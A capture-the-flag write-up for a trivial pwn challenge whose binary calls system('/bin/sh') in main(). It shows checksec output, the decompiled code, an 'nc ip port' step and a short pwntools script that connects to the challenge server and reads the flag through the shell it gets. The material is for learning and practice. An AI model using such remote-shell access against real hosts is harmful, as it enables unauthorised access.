Solution approach:
Leak or modify memory data:
- Heap address: not needed
- Stack address: not needed
- libc address: not needed
- BSS segment address: not needed
Hijack the program's control flow: not needed
Get a shell or the flag: [[call the system() already present in the program]]
Lessons learned:
Challenge information:
┌──(kali㉿kali)-[~/Desktop]
└─$ file test
test: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b113b62556555e43d9397c04b24fc651d0f71a99, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=test
RELRO:        Partial RELRO
STACK CANARY: No canary found
NX:           NX enabled
PIE:          PIE enabled
RPATH:        No RPATH
RUNPATH:      No RUNPATH
Symbols:      64) Symbols
FORTIFY:      No
Fortified:    0
Fortifiable:  0
FILE:         test
libc version:
Writeup references:
Core pseudocode analysis:
Exploitable code:
#include <stdlib.h>

// Decompiled main(): the binary spawns a shell unconditionally, so no exploit is needed
int __cdecl main(int argc, const char **argv, const char **envp)
{
    system("/bin/sh");
    return 0;
}
Analysis:
main() calls system("/bin/sh") directly, so simply connecting to the service gives a shell on the host and no exploitation is required:
nc ip port
cat ./flag
Script:
from pwn import *

# Connect to the challenge service (host and port as given by the challenge)
p = remote("node4.buuoj.cn", 27296)
# main() already runs system("/bin/sh"), so just send a command to the shell;
# pwntools expects bytes, so use a bytes literal
p.sendline(b"cat flag")
p.interactive()